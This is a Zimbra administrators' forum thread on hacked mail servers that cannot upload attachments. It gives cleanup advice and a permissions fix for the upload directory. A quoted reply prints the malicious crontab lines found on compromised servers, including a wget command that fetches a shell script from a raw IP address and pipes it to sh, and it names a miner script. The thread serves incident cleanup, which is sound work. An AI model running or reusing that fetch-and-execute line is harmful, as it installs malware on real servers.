ERROR UPLOADING FILE AND UNABLE TO FORWARD ANY MAIL WITH ATTACHMENTS

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
thiagolinhares
Posts: 9
Joined: Tue Apr 12, 2016 1:30 am

Re: ERROR UPLOADING FILE AND UNABLE TO FORWARD ANY MAIL WITH ATTACHMENTS

Postby thiagolinhares » Thu Oct 03, 2019 1:07 pm

Thank you.
I've got a case identical to yours, where its server has been hacked and compromised.
Many upgrades, patches, "zmfixperms" etc, and nothing solved it.

Checking "/opt/zimbra/data/tmp/upload" permissions, it was

Code: Select all

dr-xr-x---  2 zimbra zimbra 4096 May 24 17:04 upload

After running

Code: Select all

chmod -R 755 /opt/zimbra/data/tmp/upload/
the problem has gone away! :lol: :lol: :lol:


Todorov wrote:Well, it seems to be the sympthom of hack. First of all, you should update your zimbra to the latest version and patch it. But it's not enough to solve the problem. You have to look for the wierd or new files, particularly with .pl or .sh extensions. I have seen several hacked zimbra servers with similar symthoms. And as far as I know, there's no automated way to restore the system. One must do some hand operations.

Before you start, read the following articles:
https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/
https://lorenzo.mile.si/zimbra-zmcat-zm ... -cpu/1018/
https://forums.zimbra.com/viewtopic.php?f=15&t=66251
viewtopic.php?t=66005
viewtopic.php?t=66031
viewtopic.php?t=65932&start=140

After that.
Control your CPU load. If it's abnormally high, find the process, which loads it.
Probably you'll have to look for the *.sh files in ~/log/ , for example, /opt/zimbra/log/zmswatch.sh
Delete it if exists, because it's a viral script by bitcoin miners, burn'em in hell to the end of days.

If your CPU load becomes normal, that's all right, let's continue.
Have a look at zimbra crontab file (crontab -e).
In the very end of it you may see the line(s)
* * * * * wget -q -O - http://93.113.108.146:443/cr.sh | sh > /dev/null 2>&1
*/15 * * * * sh /opt/zimbra/log/zmswatch.sh
(They may be in the VERY-VERY end, thousands lines down. So simly cat the file /var/spool/cron/zimbra , if it has suspicious lines, it has been haked).

Then regenerate your crontab file this way: https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
After all theese steps you may have to do some additional ones, because the hackers may change some files and/or locations. The best practice here is to move your mailboxes to the totally new installation.

BUT, returning to your question,

The problem of attachment and resend messages lays in wrong permissions for the /opt/zimbra/data/tmp/upload/ directory.
So execute as root

Code: Select all

chmod -R 755 /opt/zimbra/data/tmp/upload/

- and that's it.
Maybe you'll have to change permissions even for the whole tmp directory:

Code: Select all

chmod -R 755 /opt/zimbra/data/tmp/


Sorry for my English.



Return to “Administrators”

Who is online

Users browsing this forum: No registered users and 8 guests